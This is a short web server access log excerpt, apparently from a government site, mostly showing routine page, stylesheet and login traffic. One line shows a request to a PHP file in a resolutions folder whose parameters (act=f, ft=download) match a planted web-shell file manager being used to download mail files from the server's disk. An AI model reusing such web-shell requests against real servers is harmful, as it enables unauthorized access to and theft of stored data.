66.249.66.11 - - [29/Jun/2024:09:44:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1317.pdf HTTP/1.1" 200 414750
186.86.33.204 - - [29/Jun/2024:09:44:57 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 11367
186.86.33.204 - - [29/Jun/2024:09:44:57 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:44:57 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:44:57 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:44:57 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:44:57 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:44:57 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:44:58 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:44:58 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:44:58 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
47.128.26.220 - - [29/Jun/2024:09:44:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Cmailoutput%5C&f=mail-20150724-1628-64000.txt&ft=download&white=1 HTTP/1.1" 200 856
201.245.192.253 - - [29/Jun/2024:09:44:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
186.86.33.204 - - [29/Jun/2024:09:45:03 -0500] "POST /sipse/faces/presentacion/sistema/seguridad/seleccionRol.xhtml HTTP/1.1" 200 5801
186.86.33.204 - - [29/Jun/2024:09:45:05 -0500] "POST /sipse/faces/presentacion/sistema/seguridad/seleccionRol.xhtml HTTP/1.1" 200 16340
186.86.33.204 - - [29/Jun/2024:09:45:05 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:45:05 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.33.204 - - [29/Jun/2024:09:45:05 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
